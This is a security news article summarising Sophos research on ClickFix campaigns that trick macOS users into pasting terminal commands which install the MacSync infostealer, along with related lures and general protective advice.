Recent cybersecurity investigations have uncovered three distinct ClickFix campaigns that are being used to disseminate the MacSync infostealer on macOS systems. These campaigns primarily rely on user interaction, such as copying and executing terminal commands, which makes them particularly effective against users who may not understand the risks involved. The campaigns were analyzed by Sophos researchers Jagadeesh Chandraiah, Tonmoy Jitu, Dmitry Samosseiko, and Matt Wixey.
Deployment Tactics of ClickFix Campaigns
The origin of these campaigns remains uncertain, and it is unclear if they are orchestrated by the same threat actor. Jamf Threat Labs had previously flagged the use of ClickFix strategies in December 2025. Each campaign employs unique tactics to lure users into running harmful commands on their systems.
In November 2025, a campaign used the OpenAI Atlas browser as bait, directing users through Google search results to a fake Google Sites page. Upon clicking a download button, users were instructed to open the Terminal app and paste a command, which downloaded a shell script that ran MacSync with user-level permissions. December 2025 saw another campaign that targeted users searching for “how to clean up your Mac,” leveraging legitimate OpenAI ChatGPT conversations to redirect victims to malicious landing pages.
Geographic Reach and Evolving Techniques
By February 2026, a newer campaign had emerged, targeting regions such as Belgium, India, and parts of the Americas. This version introduced a MacSync variant that utilized dynamic AppleScript payloads and in-memory execution to evade detection. These developments highlight the adaptability of threat actors in refining ClickFix tactics to bypass security measures.
Additionally, ClickFix campaigns have been observed using known platforms like Cloudflare Pages and Squarespace to host deceptive installation instructions for tools like Anthropic’s Claude Code. This approach deceives users into installing malware such as Amatera Stealer. The method, dubbed InstallFix or GoogleFix, has been noted for its effectiveness against developers accustomed to legitimate command-line installation patterns.
Wider Implications and Security Recommendations
ClickFix strategies have been adopted by various threat actors, including groups utilizing a malicious traffic distribution system (TDS) named KongTuke. This system employs compromised WordPress sites and fake CAPTCHA lures to deploy malware like ModeloRAT. Such techniques have also been linked to other attacks involving DNS TXT records and pastejacking tactics designed to install various types of stealer malware.
To mitigate these threats, security experts advise maintaining updated software, using strong passwords, enabling two-factor authentication, and remaining vigilant against phishing tactics. As demonstrated by the diversity and sophistication of ClickFix campaigns, even trusted websites can be compromised, underscoring the importance of a proactive security posture.
It’s crucial for users and site administrators to stay informed about the latest methods employed by cybercriminals and to adopt robust cybersecurity measures to protect against potential breaches.
